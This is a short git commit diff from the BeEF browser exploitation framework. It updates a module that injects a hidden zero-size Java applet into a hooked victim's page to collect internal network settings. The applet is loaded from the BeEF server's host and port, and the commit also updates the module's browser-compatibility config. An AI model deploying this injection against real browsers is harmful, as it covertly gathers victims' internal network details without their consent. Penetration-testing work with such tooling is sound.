Detect Local Settings Module: APPLET calls include domain/port. Updated target in the config
git-svn-id: https://beef.googlecode.com/svn/trunk@1238 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
@@ -24,7 +24,7 @@ beef.execute(function() {
|
||||
}
|
||||
} else {
|
||||
//Trying to insert the Beeffeine applet
|
||||
content = "<APPLET code='Beeffeine' codebase='/Beeffeine.class' width=0 height=0 id=beeffeine name=beeffeine></APPLET>";
|
||||
content = "<APPLET code='Beeffeine' codebase='http://"+beef.net.host+":"+beef.net.port+"/Beeffeine.class' width=0 height=0 id=beeffeine name=beeffeine></APPLET>";
|
||||
$j('body').append(content);
|
||||
internal_counter = 0;
|
||||
//We have to kick off a loop now, because the user has to accept the running of the applet perhaps
|
||||
|
||||
@@ -22,6 +22,6 @@ beef:
|
||||
description: "Grab the local network settings (ie internal ip address)."
|
||||
authors: ["pdp", "wade", "bm", "xntrik"]
|
||||
target:
|
||||
working: "FF"
|
||||
working: ["FF", "IE"]
|
||||
user_notify: "C"
|
||||
not_working: "IE"
|
||||
not_working: "S"
|
||||
|
||||
Reference in New Issue
Block a user